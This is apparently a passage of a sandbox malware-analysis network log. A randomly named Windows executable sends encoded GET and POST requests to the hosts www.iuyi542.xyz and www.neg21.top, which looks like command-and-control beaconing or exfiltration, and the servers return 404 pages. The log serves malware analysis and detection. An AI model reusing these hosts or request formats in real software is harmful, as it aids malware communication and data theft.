                                                                                      Nov 13, 2024 09:28:56.906215906 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                      Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                      Nov 13, 2024 09:28:56.906346083 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                      Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                      Nov 13, 2024 09:28:56.906404018 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                      Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                      Nov 13, 2024 09:28:56.906419039 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                      Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                      Nov 13, 2024 09:28:56.910883904 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                      Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.45911738.47.237.27802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:58.799527884 CET525OUTGET /cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= HTTP/1.1
                                                                                      Host: www.iuyi542.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:59.451735020 CET170INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:59 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 167433
                                                                                      Connection: close
                                                                                      ETag: "652641ca-28e09"
                                                                                      Nov 13, 2024 09:28:59.451761961 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                      Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                      Nov 13, 2024 09:28:59.451769114 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                      Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                      Nov 13, 2024 09:28:59.451781034 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                      Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                      Nov 13, 2024 09:28:59.451860905 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                      Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                      Nov 13, 2024 09:28:59.451867104 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                      Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                      Nov 13, 2024 09:28:59.451941967 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                      Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                      Nov 13, 2024 09:28:59.451961040 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                      Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                      Nov 13, 2024 09:28:59.451972961 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                      Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                      Nov 13, 2024 09:28:59.452073097 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                      Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                      Nov 13, 2024 09:28:59.457120895 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                      Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.459118206.119.81.36802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:05.187763929 CET777OUTPOST /1i1f/ HTTP/1.1
                                                                                      Host: www.neg21.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.neg21.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.neg21.top/1i1f/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 77 46 58 62 62 33 78 4d 50 45 58 33 39 58 48 57 37 2f 79 76 34 69 7a 58 32 56 61 53 38 45 34 61 63 2f 67 4d 32 4b 72 30 77 6c 50 38 55 31 4a 32 57 2b 63 61 56 4c 76 71 4c 35 47 46 32 4d 6b 47 31 42 4d 6b 39 71 72 32 64 54 53 4b 4a 42 5a 38 78 47 37 42 5a 74 2f 38 58 75 6f 43 56 79 53 36 64 31 37 59 43 56 59 6a 73 43 42 77 6d 4a 4b 43 52 7a 4c 34 48 55 79 65 54 55 79 49 71 6e 32 66 6e 62 77 32 43 77 47 68 50 63 6b 69 6b 49 2b 32 39 47 57 4d 6a 69 39 6d 71 4e 7a 2f 31 74 5a 56 6b 54 4d 6f 59 39 62 4a 30 70 79 41 6d 37 57 63 67 45 6c 59 61 41 3d 3d
                                                                                      Data Ascii: rP=QSw6gR70Eiw1wFXbb3xMPEX39XHW7/yv4izX2VaS8E4ac/gM2Kr0wlP8U1J2W+caVLvqL5GF2MkG1BMk9qr2dTSKJBZ8xG7BZt/8XuoCVyS6d17YCVYjsCBwmJKCRzL4HUyeTUyIqn2fnbw2CwGhPckikI+29GWMji9mqNz/1tZVkTMoY9bJ0pyAm7WcgElYaA==
                                                                                      Nov 13, 2024 09:29:06.128611088 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:29:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.459119206.119.81.36802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:07.783067942 CET797OUTPOST /1i1f/ HTTP/1.1
                                                                                      Host: www.neg21.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.neg21.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.neg21.top/1i1f/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 63 61 63 66 51 4d 6b 62 72 30 39 46 50 38 41 6c 4a 35 59 65 63 56 56 4d 6e 59 4c 38 2b 46 32 4d 67 47 31 42 38 6b 39 5a 44 31 64 44 53 49 53 78 5a 2b 31 47 37 42 5a 74 2f 38 58 75 39 76 56 79 4b 36 65 42 2f 59 45 48 38 67 67 69 42 33 72 5a 4b 43 48 44 4c 30 48 55 7a 6b 54 56 65 75 71 6c 4f 66 6e 5a 34 32 43 6c 36 75 61 73 6c 6e 35 59 2f 45 30 6b 72 63 36 78 55 61 6e 66 66 59 36 65 31 6b 6f 31 42 79 4a 4d 36 65 6d 70 57 7a 37 38 66 6f 74 48 59 52 42 4b 6e 58 53 32 50 58 41 52 6b 53 41 69 58 42 69 55 62 55 39 32 77 3d
                                                                                      Data Ascii: rP=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82cacfQMkbr09FP8AlJ5YecVVMnYL8+F2MgG1B8k9ZD1dDSISxZ+1G7BZt/8Xu9vVyK6eB/YEH8ggiB3rZKCHDL0HUzkTVeuqlOfnZ42Cl6uasln5Y/E0krc6xUanffY6e1ko1ByJM6empWz78fotHYRBKnXS2PXARkSAiXBiUbU92w=
                                                                                      Nov 13, 2024 09:29:08.728703022 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:29:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.459120206.119.81.36802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:10.320333958 CET10879OUTPOST /1i1f/ HTTP/1.1
                                                                                      Host: www.neg21.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.neg21.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.neg21.top/1i1f/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 51 53 77 36 67 52 37 30 45 69 77 31 79 6d 50 62 5a 51 6c 4d 4e 6b 58 77 34 58 48 57 69 76 79 72 34 69 2f 58 32 51 36 43 38 32 55 61 63 75 77 4d 32 73 2f 30 79 6c 50 38 44 6c 4a 36 59 65 63 79 56 4e 44 63 4c 38 36 4b 32 4f 6f 47 30 69 30 6b 31 49 44 31 57 44 53 49 4e 42 5a 2f 78 47 36 56 5a 75 48 77 58 75 74 76 56 79 4b 36 65 41 50 59 53 6c 59 67 6d 69 42 77 6d 4a 4b 4f 52 7a 4b 72 48 55 36 47 54 56 71 59 70 55 75 66 67 36 51 32 4f 33 53 75 47 38 6c 70 36 59 2f 63 30 6b 6d 47 36 78 4a 72 6e 62 66 69 36 64 70 6b 35 52 77 53 55 50 6d 43 6b 34 2b 62 73 4d 72 43 70 6d 51 57 4b 34 2b 75 65 6c 58 2b 61 44 34 51 62 52 75 74 78 42 50 66 75 6a 49 43 4e 74 78 6b 69 56 78 48 41 66 6e 6e 5a 78 44 31 6a 74 35 30 63 42 64 48 72 67 75 77 73 67 59 71 39 36 63 67 43 69 6f 79 54 33 63 57 42 71 38 4e 4a 4a 52 69 52 78 53 69 42 79 69 71 55 4e 62 30 7a 4f 72 39 50 74 73 4c 62 68 51 46 70 53 74 33 54 62 4c 54 33 6e 64 68 54 69 39 39 4b 37 4b 32 70 55 39 4b 43 58 58 6b 37 4f 6a 6b 78 54 73 76 78 54 43 4c 67 53 63 [TRUNCATED]
                                                                                      Data Ascii: rP=QSw6gR70Eiw1ymPbZQlMNkXw4XHWivyr4i/X2Q6C82UacuwM2s/0ylP8DlJ6YecyVNDcL86K2OoG0i0k1ID1WDSINBZ/xG6VZuHwXutvVyK6eAPYSlYgmiBwmJKORzKrHU6GTVqYpUufg6Q2O3SuG8lp6Y/c0kmG6xJrnbfi6dpk5RwSUPmCk4+bsMrCpmQWK4+uelX+aD4QbRutxBPfujICNtxkiVxHAfnnZxD1jt50cBdHrguwsgYq96cgCioyT3cWBq8NJJRiRxSiByiqUNb0zOr9PtsLbhQFpSt3TbLT3ndhTi99K7K2pU9KCXXk7OjkxTsvxTCLgSc8MYUQcqvd/Tpzz8ogbwiJKZUdgEjHvD9Ydd5hwkXtvqFg6Qbk7wyJ3BJBrbo4QcTS/xV5yjR8dZSsqeD2Hi8U6KpsWJfBOXixpfnp5sjhgBInoL3YPCnFuOU1ACzW90Lhn2yvlYRVCPTiylKnwX41zyC/+5q4nbACTq0dpgt2rFpsoRAsAZuygni7YBmCil/zbyzOMsE208KEmNo7DJXwk1eCcbjVxYUGuL8A28dayxdEj2Yc3wTrVFxDhh+pHd4PNeUVm0beT770r/qV3zF8JNr7TiUUj8YvYE6yLqMpXED+uVgr4pHFWa2UQXAl8vN64LrHVgbfAWZ81qiGpnxXHBKn/L6ayWN4XIRbSH1cGIALeQY5tOguRfDVXQrHWa9kM3svsbVZe9paOAjkCiUa3O1BaWZqW1fxir2DhYnczhvUCZbsfg/Q/TnJOdSIW9ByEIjzkRvbGUSGVYpPyC4/vojzf1Fa85+WbXKfTI1qUxC3ei7gt223A1pqfe6ZFnRJN87MiIydOlwugrEqRgt6lekhvBukRlgoAnKxmdTYUa9VRre8mUQviciPzPzzcYh2Q+8G9vUhIN128M0msEHcLFN/5wCmAiwR0EfTDMNJZXQI57lyx+n7fDa98glB8mh8SRYYeKpMJrT6i5pKeIU+I0TqcS7rI4DEQ [TRUNCATED]
                                                                                      Nov 13, 2024 09:29:11.276030064 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:29:11 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.459121206.119.81.36802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:29:12.864058971 CET523OUTGET /1i1f/?rP=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.neg21.top
